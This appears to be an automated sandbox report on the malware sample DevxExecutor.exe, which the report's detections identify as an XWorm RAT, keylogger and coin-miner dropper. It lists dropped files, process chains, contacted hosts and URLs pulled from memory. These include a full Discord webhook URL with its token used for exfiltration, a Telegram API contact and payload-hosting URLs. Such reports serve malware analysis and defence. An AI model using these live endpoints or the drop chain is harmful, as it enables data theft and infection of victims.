                                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 311 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                                Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Files and Directories | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                                Behavior Graph ID: 1439028 | Sample: DevxExecutor.exe | Start date: 09/05/2024 | Architecture: WINDOWS | Score: 100
                                [Behavior graph image. Recoverable node text: DevxExecutor.exe starts main.exe and cstealer.exe; main.exe -> cmd.exe -> Build.exe drops and starts C:\ProgramData\Microsoft\hacn.exe and C:\ProgramData\Microsoft\based.exe; hacn.exe -> cmd.exe -> s.exe drops C:\ProgramData\svchost.exe, C:\ProgramData\setup.exe and C:\ProgramData\main.exe; based.exe contacts api.telegram.org (149.154.167.220:443) and discord.com (162.159.138.232:443); raw.githubusercontent.com is also resolved.]

                                Source | Detection | Scanner | Label | Link
                                DevxExecutor.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT | -
                                DevxExecutor.exe | 53% | Virustotal | - | Browse
                                DevxExecutor.exe | 100% | Avira | TR/Dropper.Gen | -
                                DevxExecutor.exe | 100% | Joe Sandbox ML | - | -

                                Source | Detection | Scanner | Label | Link
                                C:\ProgramData\main.exe | 100% | Avira | TR/Spy.KeyLogger.kapbl | -
                                C:\ProgramData\setup.exe | 100% | Avira | TR/CoinMiner.lnxah | -
                                C:\Program Files\Google\Chrome\updater.exe | 100% | Avira | TR/CoinMiner.lnxah | -
                                C:\ProgramData\main.exe | 100% | Joe Sandbox ML | - | -
                                C:\ProgramData\Microsoft\hacn.exe | 100% | Joe Sandbox ML | - | -
                                C:\ProgramData\setup.exe | 100% | Joe Sandbox ML | - | -
                                C:\ProgramData\svchost.exe | 100% | Joe Sandbox ML | - | -
                                C:\ProgramData\Microsoft\based.exe | 100% | Joe Sandbox ML | - | -
                                C:\Program Files\Google\Chrome\updater.exe | 100% | Joe Sandbox ML | - | -
                                C:\Program Files\Google\Chrome\updater.exe | 71% | ReversingLabs | Win64.Trojan.SilentCryptoMiner | -
                                C:\ProgramData\Microsoft\based.exe | 47% | ReversingLabs | Win64.Trojan.Lazy | -
                                C:\ProgramData\Microsoft\hacn.exe | 46% | ReversingLabs | Win64.Trojan.Generic | -
                                C:\ProgramData\main.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla | -
                                C:\ProgramData\setup.exe | 71% | ReversingLabs | Win64.Trojan.SilentCryptoMiner | -
                                C:\ProgramData\svchost.exe | 42% | ReversingLabs | Win64.Trojan.Generic | -
                                C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\VCRUNTIME140.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libcrypto-1_1.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libssl-1_1.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\sqlite3.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\VCRUNTIME140.dll | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pyd | 0% | ReversingLabs | - | -
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pyd | 0% | ReversingLabs | - | -
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
discord.com | 0% | Virustotal | | Browse
raw.githubusercontent.com | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | false | | unknown
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                                                • Avira URL Cloud: safe
                                                low
                                                https://peps.python.org/pep-0205/cstealer.exe, 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  http://curl.haxx.se/rfc/cookie_spec.htmlcstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDevxExecutor.exe, 00000000.00000002.2179647836.00000000051E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://checkip.amazonaws.comzcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://json.orgcstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2314389620.0000020102AA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286765281.000002010308C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102A97000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280491817.00000201030B6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284549098.000002010308B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://superfurrycdn.nl/copy/cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 10%, Virustotal, Browse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688cstealer.exe, 00000003.00000002.2607686027.00000271D99E8000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB838000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://httpbin.org/getcstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2354769471.0000020103163000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289505736.0000020102E05000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272760282.0000020102C7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2333684327.0000020102DC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274816378.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290506090.0000020102CB7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DA7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.000002010315F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DBC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284047329.0000020102C94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://amazon.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://crunchyroll.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://gmail.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://paypal.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://uber.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://coinbase.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://rentry.co/u4tup/rawcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • 8%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 
00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://geolocation-db.com/jsonp/zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ebay.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://httpbin.org/cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://roblox.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlcstealer.exe, 00000003.00000003.2173619159.00000271DA3A1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.0000020103051000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
